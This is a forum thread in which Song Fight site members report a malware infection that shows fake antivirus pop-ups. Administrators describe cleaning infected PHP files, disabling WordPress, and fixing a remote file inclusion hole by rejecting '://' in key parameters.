Bug?

Let us know when something isn't working correctly, or if you find a typo. Do not post complaints or suggestions here.
Post Reply
User avatar
Spintown
Push Comes to Shove
Posts: 399
Joined: Fri Oct 02, 2009 9:27 pm
Submitting as: Spintown & Company
Pronouns: he/him
Contact:

Bug?

Post by Spintown »

For a few days I couldn't visit the Song Fight home page without something attacking my computer. Seems to be better now, but it still does it when I try to view the results from the last fight. I don't see anyone else mentioning it in here, so was it just me having problems?
User avatar
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish
Contact:

Re: Bug?

Post by fluffy »

"Without something attacking my computer" is a liiiiiiiiitle bit vague. Could you try posting a screenshot of what's happening, and maybe the page source?
User avatar
JonPorobil
Beat It
Posts: 5682
Joined: Sat Sep 25, 2004 11:45 am
Instruments: Piano, Guitar, Harmonica, Mandolin, Accordion, Bass, lots of VSTs
Recording Method: Cubase 10.5
Submitting as: Jon Eric, Jon Porobil, others
Pronouns: He/Him
Location: Pittsburgh, PA
Contact:

Re: Bug?

Post by JonPorobil »

Actually, Spud was just in the IRC room talking about a malware notice he got yesterday. So this is likely a known issue. Still, a little more specificity couldn't hurt.
"Warren Zevon would be proud." -Reve Mosquito

Stages, an album of about dealing with loss, anxiety, and grieving a difficult year, now available on Bandcamp and all streaming platforms! https://jonporobil.bandcamp.com/album/stages
User avatar
Spud
Hot for Teacher
Posts: 4770
Joined: Fri Sep 24, 2004 10:25 am
Instruments: Bass, Keyboards, eHorn
Submitting as: Octothorpe
Location: Seattle
Contact:

Re: Bug?

Post by Spud »

We believe that the malware issue has been resolved
"I only listen to good music. And Octothorpe." - Marcus Kellis
Song Fight! The Rockening
bartok2112
A New Player
Posts: 10
Joined: Mon Sep 06, 2010 11:50 am
Instruments: Saxophone, Keyboards
Recording Method: Sonar 8
Submitting as: Cannibal Parrot, Berkeley Social Scene (during the summers)
Location: San Jose, Ca

Re: Bug?

Post by bartok2112 »

I just got the malware, fake antivirus thing again at 2:23 pm. It happened when I clicked on the Beaten Man link under last week's fight. I also received it this morning when I voted.

- Paul
User avatar
Spud
Hot for Teacher
Posts: 4770
Joined: Fri Sep 24, 2004 10:25 am
Instruments: Bass, Keyboards, eHorn
Submitting as: Octothorpe
Location: Seattle
Contact:

Re: Bug?

Post by Spud »

Sorry, I was under the mistaken impression that JB had done something besides change the passwords. I have cleaned up the code tonight. Please continue to post notices of any further problems.

SPUD
"I only listen to good music. And Octothorpe." - Marcus Kellis
Song Fight! The Rockening
bartok2112
A New Player
Posts: 10
Joined: Mon Sep 06, 2010 11:50 am
Instruments: Saxophone, Keyboards
Recording Method: Sonar 8
Submitting as: Cannibal Parrot, Berkeley Social Scene (during the summers)
Location: San Jose, Ca

Re: Bug?

Post by bartok2112 »

Ugh, it just happened again. This time. when I went to the main Songfight.org page.
User avatar
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish
Contact:

Re: Bug?

Post by fluffy »

Spud, it would be really helpful if I could get server access again so that I can diagnose how this exploit apparently keeps happening.
User avatar
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish
Contact:

Re: Bug?

Post by fluffy »

I found a few insidiously well-hidden things that were continuously reinfecting the whole site. They should all be gone now. It also looks like the original exploit was installed via WordPress (songfight.net/blog), which I have now disabled as well. (The server logs indicate that nobody has gained unauthorized login/admin access to the actual hosting account.)

If you're running WordPress, PLEASE PLEASE PLEASE make sure that you're running the latest version of that insecure festering shitpile, because there are some pretty widespread massive exploits going on against it right now. http://blog.sucuri.net/2011/04/mass-inf ... g-com.html has a bit more information.
User avatar
ken
Hot for Teacher
Posts: 3870
Joined: Sat Sep 25, 2004 6:10 pm
Instruments: Guitar, bass, drums, keys
Recording Method: MOTU 828x, Cubase 10
Submitting as: Ken's Super Duper Band 'n Stuff
Pronouns: he/him
Location: oakland, ca
Contact:

Re: Bug?

Post by ken »

fluffy wrote:I found a few insidiously well-hidden things that were continuously reinfecting the whole site. They should all be gone now. It also looks like the original exploit was installed via WordPress (songfight.net/blog), which I have now disabled as well. (The server logs indicate that nobody has gained unauthorized login/admin access to the actual hosting account.)
HUZZAH!!!
Ken's Super Duper Band 'n Stuff - Berkeley Social Scene - Tiny Robots - Seamus Collective - Semolina Pilchards - Cutie Pies - Explino! - Bravo Bros. - 2 from 14 - and more!

i would just like to remind everyone that Ken eats kittens - blue lang
User avatar
Spud
Hot for Teacher
Posts: 4770
Joined: Fri Sep 24, 2004 10:25 am
Instruments: Bass, Keyboards, eHorn
Submitting as: Octothorpe
Location: Seattle
Contact:

Re: Bug?

Post by Spud »

Do I need to clean up again?
"I only listen to good music. And Octothorpe." - Marcus Kellis
Song Fight! The Rockening
User avatar
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish
Contact:

Re: Bug?

Post by fluffy »

What, did something happen again? I thought I'd cleaned up everything and disabled the obvious points of infection.
User avatar
Spud
Hot for Teacher
Posts: 4770
Joined: Fri Sep 24, 2004 10:25 am
Instruments: Bass, Keyboards, eHorn
Submitting as: Octothorpe
Location: Seattle
Contact:

Re: Bug?

Post by Spud »

Yes, pretty much every php file was infected. Linked or not, in use or not. Html was fine. I just cleaned up again. Will continue to monitor.
"I only listen to good music. And Octothorpe." - Marcus Kellis
Song Fight! The Rockening
User avatar
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish
Contact:

Re: Bug?

Post by fluffy »

fucking hell. must have been another infection I missed. The malware was VERY good at hiding itself, and I thought I found all the places it was coming up.

What was it infected with?
User avatar
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish
Contact:

Re: Bug?

Post by fluffy »

Found a pretty big security hole in songpage and artistpage which is being actively exploited by people. As always it's one of those things that PHP makes WAY too easy to fuck up on. Will put in a fix ASAP.
User avatar
Spud
Hot for Teacher
Posts: 4770
Joined: Fri Sep 24, 2004 10:25 am
Instruments: Bass, Keyboards, eHorn
Submitting as: Octothorpe
Location: Seattle
Contact:

Re: Bug?

Post by Spud »

fill me in off line, if possible, so that I can learn from this.

Thanks.
"I only listen to good music. And Octothorpe." - Marcus Kellis
Song Fight! The Rockening
User avatar
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish
Contact:

Re: Bug?

Post by fluffy »

Well, the main thing is something everyone should know about: include() and fopen() can both take arbitrary URLs as parameters, unless it's explicitly disabled in php.ini. Stupidest language "feature" EVER. My fix was to abort if it detects a :// in a key parameter.

I've audited all of the site-specific PHP and I think I fixed all the places where that could happen, but of course there's always the possibility of other stuff like that.

PHP really is a shitty language from a writing-secure-apps standpoint. Although I'd like to point out that if Songfight were database-driven rather than file-driven, it would be a lot easier to write code in a more secure way. Direct filesystem access is bad news in PHP.
Post Reply